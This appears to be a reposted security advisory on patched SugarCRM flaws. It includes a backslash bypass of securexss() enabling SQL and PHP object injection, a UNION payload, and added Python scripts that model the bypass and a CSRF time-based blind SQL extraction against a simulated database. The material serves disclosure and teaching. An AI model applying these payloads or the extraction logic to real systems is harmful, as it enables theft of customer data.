SugarCRM: new vulnerabilities reproduced, an attacker can remotely steal customer data - vulnerability warning - Black Bar Security Net

ID MYHACK58:62201789461
Type myhack58
Reporter Anonymous (佚名)
Modified 2017-09-25T00:00:00


Security audit of SugarCRM: multiple vulnerabilities

SugarCRM is a popular customer relationship management (CRM) solution. It currently comes in two major editions, a paid commercial edition and the open-source Community Edition, and is used in more than 120 countries and regions by over two million users to manage sensitive customer data. Not long ago a security researcher disclosed multiple vulnerabilities in the SugarCRM code, and the security of SugarCRM has since attracted the attention of other researchers in the community; SugarCRM released a new version to address the reported issues. We had previously audited the code manually, but we also wanted to see what our automated code analysis tool RIPS [reference] could contribute to the security of the software. During the analysis we discovered several exceptionally severe vulnerabilities that allow an attacker to compromise the server and steal customer data or other sensitive files. We analysed the latest open-source release, SugarCE 6.5.26, which shares its code base with the commercial edition; RIPS analysed all 816,519 lines of code and the data flows of the software in under eight minutes. In this first part of the article we present several of the most interesting findings. Note that we reported all findings to the vendor, and the vendor has since fixed the vulnerabilities described here by releasing patches.
Multi-step PHP object injection

The most serious vulnerability RIPS detected lies in the DetailView module. In the vast majority of cases, SugarCRM relies solely on the securexss() function to prevent an attacker from breaking out of an SQL string literal and injecting into a non-prepared SQL statement. This function replaces single quotes in the input with the corresponding HTML entity, which does stop the quote itself from terminating the literal. However, securexss() does not encode the backslash character. Besides the existing XSS vulnerabilities we found by using a backslash to bypass securexss(), we therefore looked at what happens when such input reaches an SQL query:

    modules/Emails/DetailView.php
    $parent_id = $_REQUEST['parent_id'];
    // cn: bug 14300 - emails_beans schema refactor - fixing query
    $query = "SELECT * FROM emails_beans WHERE email_id='{$focus->id}' AND bean_id='{$parent_id}' AND bean_module = '{$_REQUEST['parent_module']}' ";
    $res = $focus->db->query($query);
    $row = $focus->db->fetchByAssoc($res);
    if (!empty($row)) {
        $campaign_data = $row['campaign_data'];
        $macro_values = array();
        if (!empty($campaign_data)) {
            $macro_values = unserialize(from_html($campaign_data));
        }
    }

In the DetailView module the query is built dynamically from user input in which only the single quotes have been neutralised (HTML-encoded). If the user-supplied data is benign, the resulting SQL query looks as follows, and the single quotes delimit the SQL string literals as intended:

SELECT * FROM emails_beans WHERE email_id='123' AND bean_id='abc' AND bean_module='def'

What happens, though, if we append a backslash to the end of the bean_id value?

SELECT * FROM emails_beans WHERE email_id='123' AND bean_id='abc\' AND bean_module='def'

In this case the backslash escapes the closing quote of the second AND condition, so the bean_id string literal now extends over the rest of the statement up to the next single quote, which is the one that opens the bean_module value. The user-controlled value of bean_module is therefore no longer inside a string literal and is parsed as SQL. The attacker can inject arbitrary SQL without needing a single quote to break out of the literal, and SugarCRM's protection is bypassed (sugarcrm-sa-2017-006). Moreover, the campaign_data column selected by this query is passed to unserialize(), which turns the SQL injection into a PHP object injection, a very serious vulnerability class that we have discussed repeatedly in earlier articles [resources] [reference two]. The injected query then looks like this:

SELECT * FROM emails_beans WHERE email_id='123' AND bean_id='abc\' AND bean_module=' UNION ALL SELECT 1,2,3,4,CHAR(76,76),6,7 FROM emails_beans LIMIT 1 -- x'

CSRF + blind SQL injection

The SQL injection just described and another SQL injection we had reported earlier can only be exploited with a valid user session. Beyond those two, we also found a blind SQL injection, meaning that neither the query result nor any error message appears in the HTML response page.
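Before turning to the blind injection, the following Python script illustrates the backslash bypass described above. It is an added example and not SugarCRM's code: securexss() and the query builder are simplified stand-ins, the query string is the one from DetailView.php, and the small lexer mimics how MySQL delimits single-quoted literals (backslash escapes the next character, '' is an embedded quote, "-- " starts a comment). The hardened builder uses driver-style escaping of both the quote and the backslash; a prepared statement would be the proper fix.

```python
# Added example (not SugarCRM's code): shows how a value that passed through
# securexss() still breaks an SQL statement once MySQL's lexer sees a trailing
# backslash. securexss() and the query builders below are simplified stand-ins.

def securexss(value: str) -> str:
    """Simplified model of SugarCRM's securexss(): quotes become HTML
    entities, backslashes are left untouched (the root of the problem)."""
    return value.replace("'", "&#039;").replace('"', "&quot;")


def build_query(email_id: str, parent_id: str, parent_module: str) -> str:
    """The concatenated query from modules/Emails/DetailView.php, with the
    request parameters already passed through securexss()."""
    return (
        "SELECT * FROM emails_beans WHERE email_id='{}' AND bean_id='{}' "
        "AND bean_module = '{}'"
    ).format(securexss(email_id), securexss(parent_id), securexss(parent_module))


def mysql_string_literals(sql: str):
    """Lex single-quoted literals the way MySQL does: backslash escapes the
    next character, '' is an embedded quote, and '-- ' starts a comment.
    Returns (literals, tail) where tail is everything after the last literal
    that the parser treats as SQL rather than as string data."""
    literals, i, n, last_end = [], 0, len(sql), len(sql)
    while i < n:
        if sql.startswith("-- ", i):
            break  # comment: nothing after it is parsed
        if sql[i] != "'":
            i += 1
            continue
        buf, j = [], i + 1
        while j < n:
            c = sql[j]
            if c == "\\" and j + 1 < n:        # \x -> x (escape)
                buf.append(sql[j + 1]); j += 2
            elif c == "'" and j + 1 < n and sql[j + 1] == "'":
                buf.append("'"); j += 2        # '' -> '
            elif c == "'":
                break                          # literal closed
            else:
                buf.append(c); j += 1
        literals.append("".join(buf))
        i = last_end = j + 1
    return literals, sql[last_end:]


def mysql_escape(value: str) -> str:
    """Simplified driver-style escaping: neutralise the backslash as well as
    the quote, so neither can alter the literal boundaries."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_query_hardened(email_id: str, parent_id: str, parent_module: str) -> str:
    """Same query, but escaped for the database instead of for HTML."""
    return (
        "SELECT * FROM emails_beans WHERE email_id='{}' AND bean_id='{}' "
        "AND bean_module = '{}'"
    ).format(mysql_escape(email_id), mysql_escape(parent_id), mysql_escape(parent_module))


# Constructed inputs: the benign case and the backslash payload from the article.
PAYLOAD_MODULE = " UNION ALL SELECT 1,2,3,4,CHAR(76,76),6,7 FROM emails_beans LIMIT 1 -- x"

if __name__ == "__main__":
    for builder in (build_query, build_query_hardened):
        for pid, mod in (("abc", "def"), ("abc\\", PAYLOAD_MODULE)):
            lits, tail = mysql_string_literals(builder("123", pid, mod))
            print(builder.__name__, lits, repr(tail))
```

With the benign input the lexer finds the three literals '123', 'abc' and 'def' and nothing outside them; with the trailing backslash it finds only two, the second one swallowing " AND bean_module = ", and the whole UNION clause is left as unquoted SQL. The hardened builder keeps all three values inside their literals even with the payload.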
However, an attacker without any user credentials can still exploit this vulnerability remotely: instead of obtaining the victim's credentials, the attacker only needs to lure a logged-in user onto a malicious web page. The following is a demonstration of such a malicious page:

Video location:

In our demonstration, JavaScript dynamically loads an image whose URL points to the targeted SugarCRM instance, so that the victim's browser sends the request with the user's authenticated session. The URL carries an SQL payload that instructs the back-end database to delay its response depending on the content of a field. The attacker has to infer that content from the response time of the query alone; our PoC shows how usable information can be extracted from such a time-based SQL injection. Note that the extraction rate can be improved substantially with optimisation.

Credential leak, SQL injection (continued on the next page)
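The extraction logic behind such a CSRF-driven, time-based blind injection, as an added example that is not the authors' PoC: the malicious page would assign the URLs produced here to an image's src attribute, and the victim's browser would send them with the session cookie. To run offline, the browser and the database are replaced by a simulation that merely delays the "response" when the injected condition is true; the endpoint, the parameter name and the targeted column are hypothetical, since the article does not name them. The binary search over the character code is the kind of optimisation the text alludes to.

```python
import random
from urllib.parse import urlencode

# Added example, not the authors' PoC: CSRF-driven, time-based blind SQL
# injection with the victim browser and the database replaced by a simulation.
# Endpoint, parameter name and targeted column are hypothetical.

SECRET = "5f4dcc3b"          # constructed value the simulated database holds
SLEEP_SECONDS = 2.0          # delay the payload asks the database for
BASELINE_SECONDS = 0.15      # normal response time of the simulated server


def build_sql_condition(pos: int, threshold: int) -> str:
    """Condition smuggled into the vulnerable query: delay the response if the
    character at `pos` of the targeted value lies above `threshold`."""
    return (f"IF(ORD(SUBSTRING((SELECT secret FROM t LIMIT 1),{pos},1))>{threshold},"
            f"SLEEP({SLEEP_SECONDS:g}),0)")


def build_image_url(pos: int, threshold: int,
                    base: str = "https://crm.example/index.php", param: str = "id") -> str:
    """The URL the malicious page assigns to an <img> src so that the victim's
    browser requests it with the user's session (hypothetical endpoint)."""
    return base + "?" + urlencode({param: "1 AND " + build_sql_condition(pos, threshold)})


def simulated_fetch(pos: int, threshold: int) -> float:
    """Stand-in for browser + database: returns the response time in seconds,
    with some jitter, delayed by SLEEP_SECONDS when the condition is true."""
    ch = SECRET[pos - 1] if pos <= len(SECRET) else "\0"   # past the end -> ORD() = 0
    elapsed = BASELINE_SECONDS + random.uniform(0.0, 0.05)
    if ord(ch) > threshold:
        elapsed += SLEEP_SECONDS
    return elapsed


class TimingExtractor:
    """Recovers the value one character at a time by binary search over the
    code point, so each character costs 7 requests instead of up to 127."""

    def __init__(self):
        self.urls = []   # every URL the malicious page would have requested

    def oracle(self, pos: int, threshold: int) -> bool:
        self.urls.append(build_image_url(pos, threshold))
        # A response well above the baseline means the SLEEP branch ran.
        return simulated_fetch(pos, threshold) > SLEEP_SECONDS / 2

    def char_at(self, pos: int) -> str:
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(pos, mid):   # ORD(c) > mid
                lo = mid + 1
            else:
                hi = mid
        return chr(lo)

    def extract(self, max_len: int = 64) -> str:
        out = []
        for pos in range(1, max_len + 1):
            c = self.char_at(pos)
            if c == "\0":              # SUBSTRING past the end gives ORD 0
                break
            out.append(c)
        return "".join(out)


if __name__ == "__main__":
    ex = TimingExtractor()
    print(ex.extract(), "recovered with", len(ex.urls), "requests")
```

Recovering the eight-character value plus the end-of-string check takes 9 × 7 = 63 requests; testing each candidate character in turn would need up to 127 per position, which is why the response-time cost of the attack drops sharply with this optimisation. In a real browser the timing would come from the interval between assigning img.src and the onerror event firing, which a malicious page can measure without being able to read the response.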
